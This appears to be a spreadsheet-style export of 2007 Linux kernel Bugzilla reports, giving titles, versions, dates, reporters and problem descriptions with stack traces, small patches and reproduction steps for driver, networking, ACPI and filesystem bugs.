    <t>Most recent kernel where this bug did *NOT* occur: 2.6.18-1.2896.fc6(Fedora Core 6) Distribution: When I unlock the LCD monitor,the brightness of the monitor will change itself to the highest level automatically. *Note*:I built and install this kernel from source tree with gcc 4.1 version and some relevant gnu tools. Hardware Environment: IBM ThinkPad R52, Model Type:1846-5EC, Processor:Pentium M (Dothan)1.73GHz, ATI Mobility X300, Intel 915GM chipset, 768M RAM ,LCD Monitor: Generic 1024*768(maximum) 60Hz Software Environment:Fedora Core 6(updated),Gnome Environment Problem Description:I compiled this kernel successfully from source tree with gcc 4.1 and other GNU tools. Running this kernel,when I unlock my unlocked screen within Fedora Core 6, the LCD monitor changes its brightness to the highest level automatically. In fact, the kernels since 2.6.19 work with this BUG.I think it might have something to do with ACPI ,maybe others. Steps to reproduce: Every time when I unlock the locked screen, this problem turns up. *NO* abnormity ! So this is a strong BUG. No steps to be done to fix this bug on my own since I even can not be sure if this has something to do with ACPI or something else.</t>
  </si>
  <si>
    <t>ldusb returns bad data on subsequent reads if no data is available.</t>
  </si>
  <si>
    <t>2007-04-02 20:06 UTC</t>
  </si>
  <si>
    <t>Shawn Bohrer</t>
  </si>
  <si>
    <t>2007-08-10 07:14 UTC</t>
  </si>
  <si>
    <t>Problem Description: Using my Go!Temp temperature probe with the ldusb driver I decided to cat the device file /dev/ldusb0 to see what it would return. Bad idea, I was presented with an endless spewing of crap. After a little debugging it seems the problem is that in ld_usb_open dev-&gt;interrupt_in_done is set to 0, and the URB is submitted. When ld_usb_read is called if no data is in the buffer it waits for ld_usb_interrupt_in_callback to complete by checking if dev-&gt;interrupt_in_done has been set to 1. That works fine if you only read once after calling open however, if you happen to read more than once dev-&gt;interrupt_in_done is never reset so you read from the empty buffer even though no data has arrived. Steps to reproduce: Plug in a Go!Temp temperature probe dd if=/dev/ldusb0 ibs=8 count=10 dmesg notice strange error message (ldusb 4-2:1.0: Read buffer overflow, 1095783997 bytes dropped)</t>
  </si>
  <si>
    <t>b2c2-flexcop-pci causes hard lock</t>
  </si>
  <si>
    <t>2.6.21-rc5-git9</t>
  </si>
  <si>
    <t>2007-04-04 07:17 UTC</t>
  </si>
  <si>
    <t>Hendrik Borghorst</t>
  </si>
  <si>
    <t>2007-06-22 13:43 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: Distribution: Fedora 7 Rawhide Hardware Environment: I386 Compatible Software Environment: Problem Description: If you modprobe the b2c2-flexcop-pci module you got a hardlock of your system. I think it is because you use spin_lock_irq before spin_lock_init is called. I created a patch which fixes the problem. Perhaps you could have a look at it. Steps to reproduce: 1.modprobe b2c2-flexcop-pci with a b2c2 pci card inserted.</t>
  </si>
  <si>
    <t>Files on NFS filesystem incorrectly considered as modified</t>
  </si>
  <si>
    <t>2007-04-05 14:59 UTC</t>
  </si>
  <si>
    <t>2008-09-23 11:03 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.17 Distribution: Fedora Core 4 and higher Hardware Environment: x86_64, i386 Software Environment: Nothing unusual Problem Description: I use Mercurial to manage some source trees, sometimes on filesystems mounted over NFS. On 2.6.17 and earlier kernels, everything works normally. On 2.6.18 and later (2.6.19, 2.6.20), certain Mercurial commands result in Mercurial reliably thinking that files have been modified when in fact they have not. This state persists for a number of seconds, then magically resolves itself, and things behave normally until the next timie I run the given commands. I've tested against both a NetApp Filer and a Linux server running 2.6.20, and I get exactly the same symptoms in both cases, which is why I suspect that this is a client bug. Steps to reproduce: I use Mercurial Queues to reproduce this problem. Given a repository with a big patch, if I push the patch, then pop it again, all of the files it touched are marked by Mercurial as modified for a short while afterwards, with 100% reproducibility. The Python binary and Mercurial code is exactly the same in each case, though it's using the distro's native libc. Please let me know what kinds of traces you'd like to see to reproduce this. If necessary, I might be able to bisect the problem, but it will likely take a long time.</t>
  </si>
  <si>
    <t>2.6.21</t>
  </si>
  <si>
    <t>Norbert Preining</t>
  </si>
  <si>
    <t>USB device names are not sanitized for UTF-8</t>
  </si>
  <si>
    <t>2007-04-07 03:12 UTC</t>
  </si>
  <si>
    <t>2009-09-05 06:36 UTC</t>
  </si>
  <si>
    <t>The USB layer will output text device names "as is", sometimes not in 7bit ASCII or UTF-8 but ISO-8859-1 These names are reused by the xorg evdev driver to identify devices: Section "InputDevice" Identifier "track-expl" Driver "evdev" Option "Protocol" "evdev" Option "Name" "Microsoft Microsoft Trackball Explorer</t>
  </si>
  <si>
    <t>fault in vt_ioctl</t>
  </si>
  <si>
    <t>2007-04-08 06:02 UTC</t>
  </si>
  <si>
    <t>Martin Jürgens</t>
  </si>
  <si>
    <t>2007-04-13 18:51 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.12 Distribution: Ubuntu, SuSE Hardware Environment: Asrock K7S8X Software Environment: Problem Description: Sometimes the kernel oopses, see dmesg Steps to reproduce: I do not know any, I just work with my computer, it then beeps and the entries appear in dmesg.</t>
  </si>
  <si>
    <t>Wrong error handling code in epson1355fb.c</t>
  </si>
  <si>
    <t>2.6.21-rc6-git3</t>
  </si>
  <si>
    <t>2007-04-10 05:37 UTC</t>
  </si>
  <si>
    <t>2007-04-28 16:42 UTC</t>
  </si>
  <si>
    <t>I'm attaching a patch that surrounds the indented lines following the if clause with braces.</t>
  </si>
  <si>
    <t>replacing route in kernel doesn't send netlink message</t>
  </si>
  <si>
    <t>2.6.20.6</t>
  </si>
  <si>
    <t>2007-04-11 02:36 UTC</t>
  </si>
  <si>
    <t>Milan Kocian</t>
  </si>
  <si>
    <t>2007-07-18 05:45 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: I think all 2.6 kernels Distribution: Debian (with vanilla kernel) Hardware Environment: PC Software Environment: Debian Problem Description: When you replace route (via ip r r ), no netlink message is sent. Or is it feature? Steps to reproduce: 1. run 'ip monitor all' on one console 2. do 'ip r r EXISTING_ROUTE via DST' on second console 3. no message on console one Small patch for fib_hash (tested) but use carefully I am newbie :-) : --- fib_hash.c.old 2007-04-11 10:39:34.895667672 +0200 +++ fib_hash.c 2007-04-11 10:41:34.623466280 +0200 @@ -457,6 +457,8 @@ fib_release_info(fi_drop); if (state &amp; FA_S_ACCESSED) rt_cache_flush(-1); + rtmsg_fib(RTM_NEWROUTE, key, fa, cfg-&gt;fc_dst_len, tb-&gt;tb_id, + &amp;cfg-&gt;fc_nlinfo); return 0; } And for fib_trie (not tested): --- fib_trie.c.old 2007-04-11 10:39:22.728517360 +0200 +++ fib_trie.c 2007-04-11 10:40:40.778651936 +0200 @@ -1205,6 +1205,8 @@ fib_release_info(fi_drop); if (state &amp; FA_S_ACCESSED) rt_cache_flush(-1); + rtmsg_fib(RTM_NEWROUTE, htonl(key), new_fa, plen, tb-&gt;tb_id, + &amp;cfg-&gt;fc_nlinfo); goto succeeded; }</t>
  </si>
  <si>
    <t>-j REDIRECT --to-ports 1000-1009, always first choosen</t>
  </si>
  <si>
    <t>2.6.19-1.2911.fc6PAE 2.6.19-gentoo-r4</t>
  </si>
  <si>
    <t>2007-04-13 13:53 UTC</t>
  </si>
  <si>
    <t>2008-02-02 10:14 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: Distribution: FC6, gentoo Hardware Environment: Software Environment: Problem Description: Steps to reproduce: Try redirecting to range of ports with iptables, kernel(?) will always redirect to first port from given range.</t>
  </si>
  <si>
    <t>(patch queued) mtplan.c: kmalloc while spinlock is held</t>
  </si>
  <si>
    <t>2007-04-15 13:46 UTC</t>
  </si>
  <si>
    <t>Matthias Kaehlcke</t>
  </si>
  <si>
    <t>2009-03-17 09:15 UTC</t>
  </si>
  <si>
    <t>Problem Description: under some conditions mpt_lan_type_trans() can do a kmalloc(GFP_KERNEL) while the spinlock bad_naa_lock is held drivers/message/fusion/mptlan.c: ... write_lock_irq(&amp;bad_naa_lock); for (prevnh = nh = mpt_bad_naa; nh != NULL; prevnh=nh, nh=nh-&gt;next) { if ((nh-&gt;ieee[0] == fch-&gt;saddr[0]) &amp;&amp; (nh-&gt;ieee[1] == fch-&gt;saddr[1]) &amp;&amp; (nh-&gt;ieee[2] == fch-&gt;saddr[2]) &amp;&amp; (nh-&gt;ieee[3] == fch-&gt;saddr[3]) &amp;&amp; (nh-&gt;ieee[4] == fch-&gt;saddr[4]) &amp;&amp; (nh-&gt;ieee[5] == fch-&gt;saddr[5])) { found = 1; dlprintk ((KERN_INFO "mptlan/type_trans: ARP Re" "q/Rep w/ bad NAA from system already" " in DB.\n")); break; } } if ((!found) &amp;&amp; (nh == NULL)) { nh = kmalloc(sizeof(struct NAA_Hosed), GFP_KERNEL); ... AFAIK this should not be done as kmalloc could sleep while holding the spinlock</t>
  </si>
  <si>
    <t>(patch queued)lmc: copy_to/from_user cals while spinlock is held</t>
  </si>
  <si>
    <t>2007-04-15 14:28 UTC</t>
  </si>
  <si>
    <t>2008-10-17 11:04 UTC</t>
  </si>
  <si>
    <t>Problem Description: the lmc_ioctl() function in drivers/net/wan/lmc/lmc_main.c calls copy_from/to_user() while the spinlock sc-&gt;lmc_lock is held. AFAIK this should not be done as copy_from/to_user() might sleep</t>
  </si>
  <si>
    <t>hda: hw_config=603D hdb: hw_config=4F00 repeated at kernel boot</t>
  </si>
  <si>
    <t>2.6.20.7</t>
  </si>
  <si>
    <t>2007-04-16 00:32 UTC</t>
  </si>
  <si>
    <t>[User Deleted]</t>
  </si>
  <si>
    <t>2007-06-18 09:09 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.20.4 OK (no messages) Distribution: Debian GNU/Linux Etch 4.0 Hardware Environment: Laptop HP Pavilion DV4017EA, with Intel Celeron M370 1.5 Ghz and Intel 915GM chipset Software Environment: KDE and console for desktop use only Problem Description: Since I upgraded my kernel from 2.6.20.4 to 2.6.20.7, some nasty messages have appeared on the console during the kernel boot, but they seem not to have any incidence on the system hda: hx_config=603D hdb: hw_config=4F00 These messages are repeated several times on the screen when booting, and they didn't exist when booting the 2.6.20.4 kernel. Is that a bug? How can I get rid off these messages? Steps to reproduce: at each boot time</t>
  </si>
  <si>
    <t>wrong documentation for bonding driver</t>
  </si>
  <si>
    <t>2007-04-16 03:54 UTC</t>
  </si>
  <si>
    <t>2007-06-05 22:04 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.4.x, probably Distribution: Debian Hardware Environment: Ethernet interfaces Software Environment: module-init-tools 3.3-pre4 Problem Description: Documentation/networking/bonding.txt contains incorrect instructions about setting multiple bonding interfaces with different settings. The section "3.3.1 Configuring Multiple Bonds Manually" is not correct and should be removed. Examples for /etc/modprobe.conf does not work. I propose following new content for the section: 3.3.1 Configuring Multiple Bonds Manually ----------------------------------------- If you require multiple bonding devices, but all with the same options, you may wish to use the "max_bonds" module parameter, documented above. To create multiple bonding devices with differing options, it is necessary to use bonding parameters exported by sysfs. /sys/class/net/bonding_masters: read allows to find currently configured bonding devices; write allows to create a new bonding device without re-loading the driver. /sys/class/net/*/bonding/*: get/set current options for the particular bonding interface. Steps to reproduce: Try to load bonding module 2 times using "modprobe -o", as it is recommended by the current documentation. Find that only one bonding interface is created.</t>
  </si>
  <si>
    <t>sctp_getsockopt_local_addrs_old() calls copy_to_user() while a spinlock is held</t>
  </si>
  <si>
    <t>2007-04-16 14:34 UTC</t>
  </si>
  <si>
    <t>2007-07-13 20:36 UTC</t>
  </si>
  <si>
    <t>Problem Description: sctp_getsockopt_local_addrs_old() in net/sctp/socket.c calls copy_to_user() while the spinlock addr_lock is held. this should not be done as copy_to_user() might sleep. the call to sctp_copy_laddrs_to_user() while holding the lock is also problematic as it calls copy_to_user()</t>
  </si>
  <si>
    <t>boot crash + hangduring modprobe processor unless "processor.nocst" - P4/HT</t>
  </si>
  <si>
    <t>v2.6.21-rc7</t>
  </si>
  <si>
    <t>2007-04-17 01:01 UTC</t>
  </si>
  <si>
    <t>2007-04-30 20:38 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur:v2.6.20-rc7 Distribution: Suse user land Hardware Environment: P4 Software Environment: Problem Description: In roughly 2 out of 4 boots, the machine will crash or freeze during boot while loading processor.ko from initrd. It frequently just hangs, no kbd, no sysrq or anything. Sometimes it produces oopses, but it doesn't always oops in the same place. Sometimes I get a spontaneous reboot; at least once I had something trash the frame buffer with a stipple pattern. I was unable to reproduce the bug without processor.ko. acpi_serialize doesn't make a difference. Common characteristics of all backtraces as far as I was able to gather them acpi_processor_init -&gt; acpi_processor_power_init -&gt; (some ACPI eval related stuff) -&gt; do_page_fault -&gt; fixup_exception -&gt; search_exception_table -&gt; _spin_lock_irqsave Sometimes, the EIP is bad (eg 0x246) In one oops I captured, segment registers were hosed, with ds:0920 es:a574 fs:3834 gs:0033 ss:0068 So, this looks like memory corruption. I'm currently working on a bisect. Steps to reproduce:</t>
  </si>
  <si>
    <t>2.6.20-7</t>
  </si>
  <si>
    <t>2007-04-17 08:35 UTC</t>
  </si>
  <si>
    <t>Roman Fiedler</t>
  </si>
  <si>
    <t>2007-11-29 08:28 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.17 (ubuntu server) Distribution: ubuntu edgy Hardware Environment: i686 Software Environment: linux 2.6.20-7 Problem Description: When using one cryptoloop-encrypted device everything works. With two encrypted devices (say loop1, loop2), heavy IO causes the soft lockup detection to report lockups. Machine behaviour: Mouse moves with normal speed, text selection in GUI windows, desktop switching normal. USB-Keyboard input little weird: very slow and sometimes the char last typed is reported for some seconds. Startup of programs (when causing disk access) is ultra-slow. The message occurs also during normal operation (e.g. backup), but not very frequently. [ 369.163419] BUG: soft lockup detected on CPU#0! [ 369.163455] [&lt;c014f949&gt;] softlockup_tick+0x99/0xe0 [ 369.163483] [&lt;c012d3d3&gt;] update_process_times+0x33/0x80 [ 369.163501] [&lt;c0113e9d&gt;] smp_apic_timer_interrupt+0x6d/0x80 [ 369.163512] [&lt;c0103b84&gt;] apic_timer_interrupt+0x28/0x30 [ 369.163546] [&lt;c019332a&gt;] set_bh_page+0x2a/0x50 [ 369.163565] [&lt;c0193424&gt;] alloc_page_buffers+0x84/0xf0 [ 369.163596] [&lt;c01934a1&gt;] create_empty_buffers+0x11/0x90 [ 369.163611] [&lt;c0194301&gt;] __block_prepare_write+0x3c1/0x4b0 [ 369.163661] [&lt;c015a640&gt;] __pagevec_lru_add+0x90/0xa0 [ 369.163682] [&lt;c0153618&gt;] add_to_page_cache_lru+0x28/0x40 [ 369.163726] [&lt;c0194418&gt;] block_prepare_write+0x28/0x40 [ 369.163759] [&lt;c0198670&gt;] blkdev_get_block+0x0/0x70 [ 369.163775] [&lt;f886dade&gt;] do_lo_send_aops+0xbe/0x250 [loop] [ 369.163789] [&lt;c0198670&gt;] blkdev_get_block+0x0/0x70 [ 369.163818] [&lt;c0195305&gt;] end_buffer_async_write+0xa5/0x110 [ 369.163851] [&lt;c0194840&gt;] end_bio_bh_io_sync+0x0/0x40 [ 369.163882] [&lt;f8843050&gt;] cryptoloop_transfer+0x0/0x170 [cryptoloop] [ 369.163912] [&lt;f886d8e8&gt;] loop_thread+0x348/0x480 [loop] [ 369.163949] [&lt;f886da20&gt;] do_lo_send_aops+0x0/0x250 [loop] [ 369.163974] [&lt;c0137740&gt;] autoremove_wake_function+0x0/0x50 [ 369.164006] [&lt;f886d5a0&gt;] loop_thread+0x0/0x480 [loop] [ 369.164017] [&lt;c013758a&gt;] kthread+0xba/0xf0 [ 369.164029] [&lt;c01374d0&gt;] kthread+0x0/0xf0 [ 369.164044] [&lt;c0103cc7&gt;] kernel_thread_helper+0x7/0x10 [ 369.164067] ======================= [ 382.592595] BUG: soft lockup detected on CPU#0! [ 382.592626] [&lt;c014f949&gt;] softlockup_tick+0x99/0xe0 [ 382.592656] [&lt;c012d3d3&gt;] update_process_times+0x33/0x80 [ 382.592673] [&lt;c0113e9d&gt;] smp_apic_timer_interrupt+0x6d/0x80 [ 382.592685] [&lt;c0103b84&gt;] apic_timer_interrupt+0x28/0x30 [ 382.592726] [&lt;f88793f5&gt;] aes_encrypt+0x1095/0x10c0 [aes] [ 382.592881] [&lt;f88723b7&gt;] crypto_cbc_encrypt+0xa7/0x160 [cbc] [ 382.592904] [&lt;f8872050&gt;] xor_128+0x0/0x20 [cbc] [ 382.592917] [&lt;f8878360&gt;] aes_encrypt+0x0/0x10c0 [aes] [ 382.592988] [&lt;f8843182&gt;] cryptoloop_transfer+0x132/0x170 [cryptoloop] [ 382.593004] [&lt;f8872310&gt;] crypto_cbc_encrypt+0x0/0x160 [cbc] [ 382.593086] [&lt;f886db67&gt;] do_lo_send_aops+0x147/0x250 [loop] [ 382.593179] [&lt;f8843050&gt;] cryptoloop_transfer+0x0/0x170 [cryptoloop] [ 382.593209] [&lt;f886d8e8&gt;] loop_thread+0x348/0x480 [loop] [ 382.593244] [&lt;f886da20&gt;] do_lo_send_aops+0x0/0x250 [loop] [ 382.593292] [&lt;c0137740&gt;] autoremove_wake_function+0x0/0x50 [ 382.593324] [&lt;f886d5a0&gt;] loop_thread+0x0/0x480 [loop] [ 382.593334] [&lt;c013758a&gt;] kthread+0xba/0xf0 [ 382.593347] [&lt;c01374d0&gt;] kthread+0x0/0xf0 [ 382.593362] [&lt;c0103cc7&gt;] kernel_thread_helper+0x7/0x10 [ 382.593385] ======================= [ 403.588530] BUG: soft lockup detected on CPU#0! [ 403.588562] [&lt;c014f949&gt;] softlockup_tick+0x99/0xe0 [ 403.588590] [&lt;c012d3d3&gt;] update_process_times+0x33/0x80 [ 403.588607] [&lt;c0113e9d&gt;] smp_apic_timer_interrupt+0x6d/0x80 [ 403.588617] [&lt;c0103b84&gt;] apic_timer_interrupt+0x28/0x30 [ 403.588647] [&lt;f889007b&gt;] cpci_hp_intr+0x9b/0xf0 [pci_hotplug] [ 403.588673] [&lt;f88786f9&gt;] aes_encrypt+0x399/0x10c0 [aes] [ 403.588835] [&lt;f88723b7&gt;] crypto_cbc_encrypt+0xa7/0x160 [cbc] [ 403.588857] [&lt;f8872050&gt;] xor_128+0x0/0x20 [cbc] [ 403.588869] [&lt;f8878360&gt;] aes_encrypt+0x0/0x10c0 [aes] [ 403.588941] [&lt;f8843182&gt;] cryptoloop_transfer+0x132/0x170 [cryptoloop] [ 403.588958] [&lt;f8872310&gt;] crypto_cbc_encrypt+0x0/0x160 [cbc] [ 403.589043] [&lt;f886db67&gt;] do_lo_send_aops+0x147/0x250 [loop] [ 403.589115] [&lt;f8843050&gt;] cryptoloop_transfer+0x0/0x170 [cryptoloop] [ 403.589145] [&lt;f886d8e8&gt;] loop_thread+0x348/0x480 [loop] [ 403.589181] [&lt;f886da20&gt;] do_lo_send_aops+0x0/0x250 [loop] [ 403.589206] [&lt;c0137740&gt;] autoremove_wake_function+0x0/0x50 [ 403.589237] [&lt;f886d5a0&gt;] loop_thread+0x0/0x480 [loop] [ 403.589246] [&lt;c013758a&gt;] kthread+0xba/0xf0 [ 403.589259] [&lt;c01374d0&gt;] kthread+0x0/0xf0 [ 403.589274] [&lt;c0103cc7&gt;] kernel_thread_helper+0x7/0x10 [ 403.589298] ======================= Question: As I understand it, a soft lockup is a condition where no userspace program is called for more than 10 secs. Since dd is continuously moving data (userspace) and also mouse moves normally (userspace), can there really be a softlockup at the same time? Steps to reproduce: Boot from encrypted base file system on /dev/loop1 (serial-ata below) Initialise another encrypted loop device losetup -e aes /dev/loop2 /dev/sda4 dd if=/dev/zero of=/dev/loop2 dd: writing to `/dev/loop6': No space left on device 214194646+0 records in 214194645+0 records out 109667658240 bytes (110 GB) copied, 3176.65 seconds, 34.5 MB/s Copy is ok, speed as expected (serial ata + aes)</t>
  </si>
  <si>
    <t>Manually set IPv6 default route ignored</t>
  </si>
  <si>
    <t>2007-04-17 18:45 UTC</t>
  </si>
  <si>
    <t>Pierre Ynard</t>
  </si>
  <si>
    <t>2007-06-11 21:16 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.19.5 Distribution: Debian sid Hardware Environment: x86 (Pentium 4/MMX) Software Environment: iproute2-ss060323, ifupdown 0.6.8 Problem Description: Default routes added to the IPv6 routing table, which are not coming from autoconfiguration, seem to be ignored. Subsequently, IPv6 routing is disrupted, and for instance calls to connect() fail with an ENETUNREACH error. Steps to reproduce: 0. Find an IPv6-enabled box on an IPv6-free network. In the absence of any other configuration, the routing table contains the single line: fe80::/64 dev eth0 ... 1. Add a default route: ip -6 ro add default via fe80::1 dev eth0 2. Try to do IPv6, for instance: # ping6 2001:4978:1:110:0:ac:ce55:1b1e connect: Network is unreachable (returns instantly, no packet is sent) This bug is present in the last stable 2.6.20.7 kernel, and in 2.6.21-rc7. I actually came across this bug on a server on a network where IPv6 is routed and advertised, but with autoconfiguration disabled on this server. It *seems* to me that if the interface is brought up with accept_ra enabled, default routes, including the one got from RA and ones input by hand later will work, whereas if it is brought up with accept_ra disabled (or no RA is received), the problem will occur. Note that routes with a non-null prefix length, such as 3 or 1, work fine.</t>
  </si>
  <si>
    <t>battery caching introduces a lock up</t>
  </si>
  <si>
    <t>2.6.21-rc6-mm broken-out-2007-04-11-02-24</t>
  </si>
  <si>
    <t>2007-04-19 10:33 UTC</t>
  </si>
  <si>
    <t>Marek Lotke</t>
  </si>
  <si>
    <t>2007-07-25 22:27 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: Distribution: gentoo Hardware Environment: Lenovo N100 BIOS v2.03 Software Environment: Problem Description: The patch "ACPI: Cache battery status instead of re-evaluating AML" locks up processes reading battery status. Loading with parameter battery_update = 5 doesn't help. Reverting this patch (b6ce4083ed8e2a01a3a59301eabe0fc1e68a8a84) fixes the issue. Here is a call trace: hald D F72A1CB4 0 1361 1085 (NOTLB) f72a1ccc 00000086 00000002 f72a1cb4 f72a1cb0 00000000 c024e060 00000001 f7feda00 c1d11030 c1d194dc f7eb65b0 f9727f1e 0000001a f7eb66ac c1c02cc0 00000001 0000028b c02552b4 00000003 00000000 01000003 c0241e14 fffcdb67 Call Trace: [&lt;c024e060&gt;] acpi_ns_opens_scope+0xb/0x43 [&lt;c02552b4&gt;] acpi_ut_allocate_object_desc_dbg+0x29/0x60 [&lt;c0241e14&gt;] acpi_ds_init_object_from_op+0x114/0x1e8 [&lt;c03211c2&gt;] __mutex_lock_slowpath+0x52/0x90 [&lt;c0242418&gt;] acpi_ds_create_operand+0x1cc/0x1d8 [&lt;c032100a&gt;] mutex_lock+0xa/0x10 [&lt;c02594a1&gt;] acpi_battery_notify+0x26/0xa3 [&lt;c024b380&gt;] acpi_ex_exit_interpreter+0xa/0x2f [&lt;c02448ba&gt;] acpi_ev_queue_notify_request+0xd0/0xf2 [&lt;c024149d&gt;] acpi_ds_exec_end_op+0xc2/0x3d1 [&lt;c024fe49&gt;] acpi_ps_complete_op+0x1c5/0x1db [&lt;c02503dd&gt;] acpi_ps_parse_loop+0x57e/0x735 [&lt;c023f1b4&gt;] acpi_os_release_object+0x8/0xe [&lt;c024f85c&gt;] acpi_ps_parse_aml+0x60/0x237 [&lt;c0243479&gt;] acpi_ds_init_aml_walk+0xb4/0x102 [&lt;c0250ab2&gt;] acpi_ps_execute_method+0x11b/0x1bd [&lt;c024dd7d&gt;] acpi_ns_evaluate+0x9d/0xfc [&lt;c024d9d2&gt;] acpi_evaluate_object+0x126/0x1d0 [&lt;c0173888&gt;] get_empty_filp+0x58/0x130 [&lt;c02596f2&gt;] acpi_battery_get_state+0x50/0xb1 [&lt;c02598cd&gt;] acpi_battery_update+0x2e/0x8b [&lt;c0259fed&gt;] acpi_battery_read_state+0x5d/0x249 [&lt;c01628d6&gt;] __vma_link+0x36/0x70 [&lt;c01758c9&gt;] cp_new_stat64+0xf9/0x110 [&lt;c018c938&gt;] seq_read+0x68/0x2b0 [&lt;c018c8d0&gt;] seq_read+0x0/0x2b0 [&lt;c01a4cd0&gt;] proc_reg_read+0x70/0xc0 [&lt;c0172c41&gt;] vfs_read+0xa1/0x130 [&lt;c01a4c60&gt;] proc_reg_read+0x0/0xc0 [&lt;c0173171&gt;] sys_read+0x41/0x70 [&lt;c01041ca&gt;] sysenter_past_esp+0x5f/0x85 Steps to reproduce: cat /proc/acpi/battery/BAT1/state (a few times)</t>
  </si>
  <si>
    <t>Ps/2 Logitech Optic wheel Mouse Kernel 2.6.20-15</t>
  </si>
  <si>
    <t>2.6.20-15</t>
  </si>
  <si>
    <t>2007-04-20 11:08 UTC</t>
  </si>
  <si>
    <t>Marcel</t>
  </si>
  <si>
    <t>2007-08-04 11:01 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.17-10 Distribution: Ubuntu/Kubuntu 7.04 Hardware Environment: Ps/2 logitech optic wheel Mouse Software Environment: Problem Description: not work Steps to reproduce:</t>
  </si>
  <si>
    <t>eth1394 does not work over S400B</t>
  </si>
  <si>
    <t>2007-04-22 12:40 UTC</t>
  </si>
  <si>
    <t>2007-05-02 07:12 UTC</t>
  </si>
  <si>
    <t>The setup Linux/1394b - 9-to-6-pin cable - 1394b HDD --- Linux/1394b does not work: Ping says "Destination Host Unreachable". This setup forces the bus to work at S400(A) and looks exactly like an S400B bus. This coincides with a report that I got via personal mail: eth1394 does not work on an S400B bus because no GASP packets are sent.</t>
  </si>
  <si>
    <t>Sound does not work for ATI SB450 HDA</t>
  </si>
  <si>
    <t>2007-04-22 17:33 UTC</t>
  </si>
  <si>
    <t>2007-10-18 21:40 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: Distribution: Ubuntu Feisty Hardware Environment: Software Environment: Default Problem Description: Not sound Steps to reproduce: Bug open in: https://bugs.launchpad.net/ubuntu/+source/linux-source-2.6.20/+bug/103379</t>
  </si>
  <si>
    <t>Bugzilla.Kernel.org is too old...</t>
  </si>
  <si>
    <t>2007-04-24 15:39 UTC</t>
  </si>
  <si>
    <t>Marco Rodrigues</t>
  </si>
  <si>
    <t>2007-06-19 10:22 UTC</t>
  </si>
  <si>
    <t>http://www.bugzilla.org/releases/2.22/new-features.html Update bugzilla to latest stable version, it has many security fix and features.</t>
  </si>
  <si>
    <t>ACPI: Unable to turn cooling device [c146aec8] 'on'</t>
  </si>
  <si>
    <t>2.6.21-rc7</t>
  </si>
  <si>
    <t>2007-04-27 01:16 UTC</t>
  </si>
  <si>
    <t>2008-08-07 21:04 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: None Distribution: Debian 4.0 - Etch (Final) Hardware Environment: HP/Compaq nc6000 (laptop), Pentium M 1.6 GHz, Intel ICH4, ATI Radeon Mobility 9600, 512 MB RAM, newest available BIOS Software Environment: Debian Etch, no self-compiled tools but the kernel Problem Description: This is gonna be quite a long but hopefully equally useful description: Shortly after I bought the laptop and installed Linux on it, I noticed that it sometimes turned itself off while I was away and did not turn off the computer. It took me quite a while to figure out what was wrong until the laptop shut down by itself while I was using it. The kernel printed a message that a ACPI critical trip point was reached and shut the system down to prevent damage. After I knew there was a temperature problem I wrote a script to log the temperatures and after it happend again I saw that the temperatures suddenly started to rise from about 40</t>
  </si>
  <si>
    <t>Averatec 3156X laptop doesn't reboot with kernels &gt; 2.6.13.5 (responsible commit found)</t>
  </si>
  <si>
    <t>2.6.14 till 2.6.21</t>
  </si>
  <si>
    <t>2007-04-27 10:42 UTC</t>
  </si>
  <si>
    <t>Lee Garrett</t>
  </si>
  <si>
    <t>2009-02-12 13:45 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.13.5 Distribution: Debian Hardware Environment: Averatec 3156X (seemingly identical to the american model 3150P) Software Environment:? Problem Description: I noticed that with recent kernels my laptop would reboot when I do an 'init 6', but hang at the end of the init run. The last working vanilla kernel is 2.6.13.5. With some trying and a bit of guessing I found a change to include/asm-i386/mach-default/mach_reboot.h in 2.6.14 to be the culprit. It can be found at: http://git.kernel.org/?p=linux/kernel/git/stable/linux-2.6.14.y.git;a=commitdiff;h=59f4e7d572980a521b7bdba74ab71b21f5995538 On a 2.6.21 source tree I can revert this patch, and then rebooting works. Steps to reproduce: 1) On a Averatec 3156X (or 3150p?) boot to your default runlevel. 2) as root, type "init 6". 3) instead of rebooting, the system will hang at the end with a blank screen. Greetings, Lee P.S: I'm not sure if I assigned this bug to the right category. Assign if needed.</t>
  </si>
  <si>
    <t>Neil Horman</t>
  </si>
  <si>
    <t>(net forcedeth) doesn't wol on suspend</t>
  </si>
  <si>
    <t>2007-04-27 14:51 UTC</t>
  </si>
  <si>
    <t>Matthieu Baechler</t>
  </si>
  <si>
    <t>2009-10-25 10:37 UTC</t>
  </si>
  <si>
    <t>Distribution: debian unstable Hardware Environment: Athlon 3000+ on a K8N-E-Deluxe Software Environment: Linux 2.6.21-rc5 Problem Description: The integrated NIC of my motherboard supports wol propertly when I hald my computer. But when I use suspend to ram or suspend to disk, wol doesn't work anymore. Steps to reproduce: Steps that works : 1/ power on the computer 2/ boot linux 3/ execute "ethtool -s eth0 wol g" 4/ halt 5/ send a magic packet with wakeonlan from another computer Steps that doesn't work : 1/ power on the computer 2/ boot linux 3/ execute "ethtool -s eth0 wol g" 4/ cat mem &gt; /sys/power/state 5/ send a magic packet with wakeonlan from another computer Same thing with s2disk. I'd like to use wol + suspend to ram. #lspci server:/home/matthieu# lspci 00:00.0 Host bridge: nVidia Corporation nForce3 250Gb Host Bridge (rev a1) 00:01.0 ISA bridge: nVidia Corporation nForce3 250Gb LPC Bridge (rev a2) 00:01.1 SMBus: nVidia Corporation nForce 250Gb PCI System Management (rev a1) 00:02.0 USB Controller: nVidia Corporation CK8S USB Controller (rev a1) 00:02.1 USB Controller: nVidia 